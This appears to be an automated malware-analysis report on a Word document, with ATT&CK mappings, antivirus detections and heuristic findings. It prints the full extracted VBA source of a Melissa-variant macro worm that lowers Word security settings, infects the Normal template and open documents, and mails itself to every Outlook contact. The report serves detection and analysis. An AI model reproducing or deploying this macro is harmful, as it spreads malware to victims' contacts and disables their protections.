MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. This macro attempts to modify the Word Normal template to establish persistence and potentially spread via Outlook by creating an Outlook.Application object. The ClamAV detection of 'Win.Trojan.Melissa-10' strongly suggests this family.
Heuristics 5
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2554 bytes |
SHA-256: b7be5b357a29906d53e28cec46dac20cde5f6876adad7d02c57f873514c365da |
|||
|
Detection
ClamAV:
Doc.Trojan.Melissa-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Anti-Smyser'
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
End If
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTL = NT.CodeModule.CountOfLines
If NT.CodeModule.Lines(11, 1) <> "NTL = NT.CodeModule.CountOfLines" Then
Set Sr = MacroContainer.VBProject.VBComponents.Item(1)
SrL = Sr.CodeModule.CountOfLines
If NTL > 0 Then NT.CodeModule.DeleteLines 1, NTL
NT.CodeModule.InsertLines 1, Sr.CodeModule.Lines(1, SrL)
NT.Name = "Melissa"
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
Set kD = Application.Documents.Item(k).VBProject.VBComponents.Item(1)
kDL = kD.CodeModule.CountOfLines
If kD.CodeModule.Lines(11, 1) <> "NTL = NT.CodeModule.CountOfLines" Then
If kDL > 0 Then kD.CodeModule.DeleteLines 1, kDL
kD.CodeModule.InsertLines 1, NT.CodeModule.Lines(1, NTL)
End If
kD.Name = "Melissa"
Next k
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Cruson") <> "I remembered our old fucking dog last night" Then
Dim OL, mapi, msg
Set OL = CreateObject("Outlook.Application")
Set mapi = OL.GetNameSpace("MAPI")
If OL = "Outlook" Then
mapi.Logon "profile", "password"
Set AB = mapi.AddressLists(0)
Set msg = OL.CreateItem(0)
For i = 1 To AB.AddressEntries.Count
Peep = AB.AddressEntries(i)
msg.Recipients.Add Peep
Next i
msg.Body = "I remembered something last night. It is very, very important document. Look in attachment."
msg.Subject = "From " & Application.UserName
msg.Attachments.Add ActiveDocument.FullName
msg.Send
Peep = ""
mapi.Logoff
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Cruson") = "I remembered our old fucking dog last night"
End If
End If
End Sub
Private Sub Document_Close()
Document_Open
End Sub
Private Sub Document_New()
Document_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.